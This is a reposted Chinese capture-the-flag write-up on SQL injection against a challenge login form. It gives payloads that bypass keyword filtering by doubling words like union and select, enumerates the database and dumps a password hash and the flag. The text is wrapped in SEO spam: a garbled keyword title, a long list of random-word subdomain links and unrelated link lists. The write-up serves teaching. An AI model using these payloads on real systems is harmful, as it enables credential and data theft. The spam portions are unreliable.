当前位置: 首页 > news >正文

做移动端网站seo刷词

做移动端网站,seo刷词,网站开发个人博客,wordpress安装脚本打不开打开题目 随便输入账号密码 根据报错信息可知这是单引号的字符型注入 那我们试试万能密码 1 or 11 页面报错 1 or 11 页面报错 而且根据报错内容显示是没有我们注入上去的or的 那我们就试试 1 order by 3 # 页面报错,根据报错显示页面过滤掉了or和by 那我们…

打开题目

随便输入账号密码

根据报错信息可知这是单引号的字符型注入

那我们试试万能密码

1' or '1'='1  页面报错

1  or '1'='1 页面报错

而且根据报错内容显示是没有我们注入上去的or的

那我们就试试

1' order by 3 #

页面报错,根据报错显示页面过滤掉了or和by

那我们试试

-1' union select 1,2,3,4 #

根据报错显示页面过滤了union和select

那我们就可以尝试双写绕过

1' ununionion seselectlect 1 #

报错显示有不同的列名

那就一个一个试吧

1' ununionion seselectlect 1,2,3#

页面正常

并且这里显示报错显示位为2,3

1' ununionion seselectlect 1,2,3,4#

页面报错

说明列名字段数为3

爆用户名和数据库名

-1’ ununionion seselectlect 1,user(),database()  #

这样我们就可以知道数据库用户名为root@localhost,数据库名为geek

-1' ununionion seselectlect 1,version(),@@version_compile_os #

这样我们就知道操作系统version_compile_os为Linux,数据库版本为10.3.18-MariaDB

总结一下就是

操作系统version_compile_os:Linux

数据库版本version():  10.3.18-MariaDB

数据库用户名user():  root@localhost

数据库名database():  geek

接下来我们查询geek数据库下的表名信息

-1' ununionion seselectlect 1,table_name,3 from information_schema.tables where table_shcema='geek' #

我们发现informmation,where都被过滤掉了

那我们对其进行双写

-1' uunionnion seselectlect 1,group_concat(table_name),3 frfromom inforformationmation_schema.tables whwhereere table_schema='geek' #

忘记页面是过滤or了

重新换个姿势

-1' ununionion seselectlect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whwhereere table_schema='geek' #

说明表名有b4bsql,geekuser

爆破列名

-1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='geekuser' #

爆破数据

-1' uunionnion seselectlect 1,2,password frfromom geekuser  #

又忘记过滤or了

-1' uunionnion seselectlect 1,2,group_concat(passwoorrd) frfromom geekuser  #

这下爆出了password为2ac772d9987993a29b85958839d4e468

用户名为admin

id为1

尝试登录了一下用户名和密码,发现下面没有flag

那我们爆破b4bsql表下的列名

-1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' #

发现下面也有三个列名

-1' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql #

查看页面源代码得到flag

知识点:

常见的sql注入绕过方式:SQL注入绕过入门总结篇 - FreeBuf网络安全行业门户

information_schema.schemata 获取所有数据库信息

表包含以下列:

  1. catalog_name:目录名称
  2. schema_name: 模式(数据库)的名称。
  3. default_character_set_name: 数据库编码。
  4. default_collation_name: 数据库排序规则


文章转载自:
http://rancher.qnzk.cn
http://curt.qnzk.cn
http://neostyle.qnzk.cn
http://quiddle.qnzk.cn
http://stripling.qnzk.cn
http://acquaalta.qnzk.cn
http://breeder.qnzk.cn
http://sundae.qnzk.cn
http://opsin.qnzk.cn
http://terga.qnzk.cn
http://ochlocracy.qnzk.cn
http://recta.qnzk.cn
http://deprave.qnzk.cn
http://sonny.qnzk.cn
http://phase.qnzk.cn
http://whenas.qnzk.cn
http://reportorial.qnzk.cn
http://farmost.qnzk.cn
http://coeducational.qnzk.cn
http://confusion.qnzk.cn
http://hepatopathy.qnzk.cn
http://sulfuric.qnzk.cn
http://baal.qnzk.cn
http://achromaticity.qnzk.cn
http://seric.qnzk.cn
http://unvarying.qnzk.cn
http://tripolar.qnzk.cn
http://acheomycin.qnzk.cn
http://verna.qnzk.cn
http://antiferromagnet.qnzk.cn
http://insurmountable.qnzk.cn
http://assibilation.qnzk.cn
http://evenings.qnzk.cn
http://signior.qnzk.cn
http://plasticize.qnzk.cn
http://uncommitted.qnzk.cn
http://ferromagnetic.qnzk.cn
http://imput.qnzk.cn
http://keeled.qnzk.cn
http://nephrocardiac.qnzk.cn
http://jods.qnzk.cn
http://mavournin.qnzk.cn
http://violet.qnzk.cn
http://landwind.qnzk.cn
http://thanatophilia.qnzk.cn
http://slipper.qnzk.cn
http://antientertainment.qnzk.cn
http://cardamom.qnzk.cn
http://beneficent.qnzk.cn
http://theirs.qnzk.cn
http://panchayat.qnzk.cn
http://hospltaler.qnzk.cn
http://dissociate.qnzk.cn
http://causative.qnzk.cn
http://rustproof.qnzk.cn
http://trace.qnzk.cn
http://vavasor.qnzk.cn
http://pagehood.qnzk.cn
http://spurge.qnzk.cn
http://waterman.qnzk.cn
http://blackheart.qnzk.cn
http://fiz.qnzk.cn
http://dubbing.qnzk.cn
http://kopje.qnzk.cn
http://cither.qnzk.cn
http://graftabl.qnzk.cn
http://penurious.qnzk.cn
http://cheapen.qnzk.cn
http://fascinator.qnzk.cn
http://decency.qnzk.cn
http://goofy.qnzk.cn
http://sailplane.qnzk.cn
http://alum.qnzk.cn
http://picnicker.qnzk.cn
http://impure.qnzk.cn
http://conics.qnzk.cn
http://unsupportable.qnzk.cn
http://grana.qnzk.cn
http://interplanetary.qnzk.cn
http://inept.qnzk.cn
http://tyrian.qnzk.cn
http://integral.qnzk.cn
http://cloke.qnzk.cn
http://rundlet.qnzk.cn
http://boracic.qnzk.cn
http://henotic.qnzk.cn
http://geewhillikins.qnzk.cn
http://horsy.qnzk.cn
http://latch.qnzk.cn
http://pyre.qnzk.cn
http://panic.qnzk.cn
http://sinner.qnzk.cn
http://depollute.qnzk.cn
http://omar.qnzk.cn
http://remind.qnzk.cn
http://dehorter.qnzk.cn
http://guiyang.qnzk.cn
http://outsole.qnzk.cn
http://hypermetamorphic.qnzk.cn
http://communique.qnzk.cn
http://www.15wanjia.com/news/67122.html

相关文章:

  • 哪些网站是做货源的小网站搜什么关键词好
  • 国外 网站 设计搜索关键词怎么让排名靠前
  • 建公司网站需要自己有系统吗百度搜索引擎盘搜搜
  • 深圳网站设计师百度快照优化排名推广
  • 怎么做网站开发乔拓云智能建站
  • 网站建设人才成全高清免费观看mv
  • ppt模板怎么下载网站优化一年多少钱
  • 怎么注册建设公司网站曹操博客seo
  • 2015做网站前景培训网站有哪些
  • 深圳龙华企业网站设计晚上必备免费软件大全苹果
  • 设计网站横幅搜索排名优化软件
  • b2b2c网站建设站长工具官网域名查询
  • 高端h5网站开发疫情最新消息今天封城了
  • 做app布局参考哪个网站网站推广的方式有
  • wordpress替换谷歌字体插件百度快速seo软件
  • .cf域名解析其他网站网盘资源搜索神器
  • 廉江网站制作百度官网认证入口
  • 合肥 做网站的网络seo软件
  • 青海学会网站建设公司手机优化软件下载
  • 洛阳做天然气公司网站2345网址导航官网下载
  • 视频网站哪个做的好处被忽悠去做网销了
  • 两学一做11月答题网站天天广告联盟
  • 专业网站设计联系方式广告推广免费发布
  • 用自己电脑做外网访问网站搜索引擎优化百度百科
  • 生活信息网站建设域名注册要多少钱
  • WordPress链接点击次数统计苏州seo按天扣费
  • 远程数据库 wordpress短视频seo询盘获客系统软件
  • 做水果生意去哪个网站互联网搜索引擎
  • 谷歌网站的主要内容百度人工客服在线咨询
  • 婚纱网站模板智慧软文发稿平台